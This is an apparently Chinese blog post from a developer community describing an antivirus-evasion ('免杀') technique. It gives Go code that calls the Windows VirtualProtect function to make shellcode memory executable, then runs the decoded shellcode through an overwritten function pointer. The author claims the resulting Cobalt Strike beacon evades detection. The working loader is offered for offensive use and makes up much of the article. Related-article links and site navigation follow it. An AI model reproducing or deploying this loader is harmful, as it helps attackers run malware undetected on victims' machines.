AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

我的免杀之路:虚拟保护

2021-12-06 710
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 虚拟保护技术利用的是 Windows API 中的 VirtualProtect 函数,是对应 Win32 函数的逻辑包装函数,它会在呼叫处理程序的虚拟位置空间里,变更认可页面区域上的保护。

简述


虚拟保护技术利用的是 Windows API 中的 VirtualProtect 函数,是对应 Win32 函数的逻辑包装函数,它会在呼叫处理程序的虚拟位置空间里,变更认可页面区域上的保护。说明白点,它的作用就是改变调用进程的一段页的保护属性,如果想要改变其他进程,就需要用到 VirtualProtectEx 函数。这里,我利用 VirtualProtect 函数将 shellcode 所在内存区域设置为可执行模式,并且设置好 shellcode 所在内存起始地址以及内存原始属性类型保存地址,这样的 shellcode 内存区域被设置成可执行模式后,shellcode 就会被正常执行了。


实现思路


关于VirtualProtect函数代码如下:

func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {

ret, _, _ := procVirtualProtect.Call(

uintptr(lpAddress),

uintptr(dwSize),

uintptr(flNewProtect),

uintptr(lpflOldProtect))

return ret > 0

}


简单的解释下以上的参数

lpAddress:要改变属性的内存起始地址(shellcode所在内存空间的起始地址)

dwSize:要改变属性的内存区域大小(shellcode长度大小)

flNewProtect:内存新的属性类型,设置为PAGE_EXECUTE_READWRITE(0x40)时该内存页为可读可写可执行。(此值为0x40)

备注:为什么是0x40,这个值怎么来的。下方链接有介绍哈,这里我简单解释一下。这是填的是内存保护常数,常数的值不同所对应的功能也不一样,对照链接里面的描述,因为现在我需要这个内存区域的可执行权限和写权限,所以这里的值必须得是0x40才能满足我的需求。

https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants

lpflOldProtect:内存原始属性类型保存地址。


再来看看核心代码部分:

func ShellCodeVirtualProtect(sc string) {

f := func() {}

var oldfperms uint32

if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {

panic("Call to VirtualProtect failed!")

}

ds, _ := hex.DecodeString(sc)

**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&ds))

var oldshellcodeperms uint32

if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&ds))), uintptr(len(ds)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {

panic("Call to VirtualProtect failed!")

}

f()

}


可见其核心就是利用 VirtualProtect 函数实现,ds 就是 shellcode。如果函数成功,则返回值非零。如果函数失败,则返回值为零。

 

最后的CS上线免杀效果:

图片1.png

图片2.png

图片3.png


参考资料:

https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect

https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants

https://blog.csdn.net/weixin_34004576/article/details/90360650

https://blog.csdn.net/zacklin/article/details/7478118



文章标签:
Windows
API
Snaker
目录
相关文章
肾透侧视攻城狮
|
10天前
|
网络协议 安全 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
实战:WireShark 抓包及快速定位数据包技巧、使用 WireShark 对常用协议抓包并分析原理 、WireShark 抓包解决服务器被黑上不了网等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
肾透侧视攻城狮
36 0
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
肾透侧视攻城狮
|
10天前
|
网络协议 安全 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9-2):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
实战:WireShark 抓包及快速定位数据包技巧、使用 WireShark 对常用协议抓包并分析原理 、WireShark 抓包解决服务器被黑上不了网等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
肾透侧视攻城狮
31 0
肾透侧视攻城狮
|
10天前
|
安全 算法 网络协议
网络空间安全之一个WH的超前沿全栈技术深入学习之路(六:保姆级教会你如何对Kali本地网络配置、 sshd 服务并使用 xshell 连接:就怕你学成黑客啦!)作者——LJS
保姆级教会你如何对Kali本地网络配置、 sshd 服务并使用 xshell 连接
肾透侧视攻城狮
30 0
游客qeoynko2nmbgk
|
2月前
|
安全 Linux Windows
小试跨平台局域网文件传输工具NitroShare,几点感想
小试跨平台局域网文件传输工具NitroShare,几点感想
游客qeoynko2nmbgk
44 0
陌陌谣
|
5月前
|
传感器 运维 监控
局域网监控软件如何选丨这篇文章教会你
监控局域网活动,试试WorkWin(员工行为监控,USB及带宽管理,远程控制,权限分配)和NetFlow Analyzer(流量分析,带宽监控,如Wireshark和PRTG)。还有ManageEngine OpManager(实时监控,报警通知,自动化任务),确保网络安全和效率。来源不详。
陌陌谣
83 2
幼稚十一
|
6月前
【计网·湖科大·思科】实验一 熟悉仿真软件及访问WEB服务器
【计网·湖科大·思科】实验一 熟悉仿真软件及访问WEB服务器
幼稚十一
55 0
wljslmz
|
监控 网络协议 安全
2023年最新整理的中兴设备命令合集,网络工程师收藏!
2023年最新整理的中兴设备命令合集,网络工程师收藏!
wljslmz
431 0
matches999
|
人工智能 算法 架构师
计算机学习路线规划,和我一同打开计算机学习的大门吧!
计算机学习路线规划,和我一同打开计算机学习的大门吧!
matches999
217 0
计算机学习路线规划,和我一同打开计算机学习的大门吧!
龙蜥社区(OpenAnolis)
|
运维 虚拟化 Anolis
浪潮信息工程师:谈一谈设备透传虚拟机启动慢背后的原因及其优化方法 | 第 51 期
明天下午4点,一起听浪潮信息工程师解析设备透传虚拟机启动慢的原因及优化方法。
龙蜥社区(OpenAnolis)
192 0
浪潮信息工程师:谈一谈设备透传虚拟机启动慢背后的原因及其优化方法 | 第 51 期
耀骑士
|
数据挖掘 大数据
收藏转发!这五款宝藏软件你一定要用一下
今天带来五款宝藏软件,身为宝藏男孩和宝藏女孩的你们,不试一下吗?
耀骑士
170 1
收藏转发!这五款宝藏软件你一定要用一下

热门文章

最新文章

  • 1
    常见浏览器User-Agent大全
  • 2
    未来已来!阿里小蜜AI技术揭秘
  • 3
    Flink: 实时规则引擎助力新零售发展
  • 4
    Apache Flink 进阶(三):Checkpoint 原理解析与应用实践
  • 5
    weex-html5 组件进阶
  • 6
    群智能算法:灰狼优化算法(GWO)的详细解读
  • 7
    Amazon 的IoT之路
  • 8
    hp M1530一体机无法在OEM系统下安装驱动
  • 9
    NumPy Cookbook 带注释源码 十、Scikit 中的乐趣
  • 10
    潮流设计:15个创意的 3D 字体版式作品欣赏
  • 1
    springboot配置hosts文件
    23
  • 2
    maven项目的pom.xml文件常用标签使用介绍
    23
  • 3
    天气预报-腾讯天气-7天-地址查询版免费API接口
    19
  • 4
    第四届人文,智慧教育与服务管理国际学术会议(HWESM 2025) 2025 4th International Conference on Humanities, Wisdom Education and Service Management
    19
  • 5
    2025电气自动化与电机系统国际学术会议(EAMS 2025) 2025 International Conference on Electrical Automation and Motor System
    19
  • 6
    大厂面试高频:什么是自旋锁?Java 实现自旋锁的原理?
    16
  • 7
    C++ 之 perf+火焰图分析与调试
    16
  • 8
    面试高频:Synchronized 原理,建议收藏备用 !
    13
  • 9
    SQL 中,通配符
    12
  • 10
    鸿蒙next版开发:相机开发-适配不同折叠状态的摄像头变更(ArkTS)
    18

    • 相关课程

    更多
  • 机器阅读技术与应用
  • 云计算工程师解析与实战-网络专家篇(体验版)
  • 场景实践-新手玩转云计算-搭建Linux学习环境
  • 阿里小蜜中的机器阅读技术
  • Linux高级网络应用 - 网络管理与配置实战
  • 网络安全攻防 - Web渗透测试

    • 相关电子书

    更多
  • 移动虚拟化:360分身大师那些事
  • 长安十二时辰背后的技术秘籍
  • 视觉计算机开发者系列手册

    • 相关实验场景

    更多
  • 每个IT人都想学的“Web应用上云经典架构”实战
  • 基于函数计算快速搭建Zblog等传统应用框架
  • 1分钟部署经典小游戏
    • 下一篇
    无影云桌面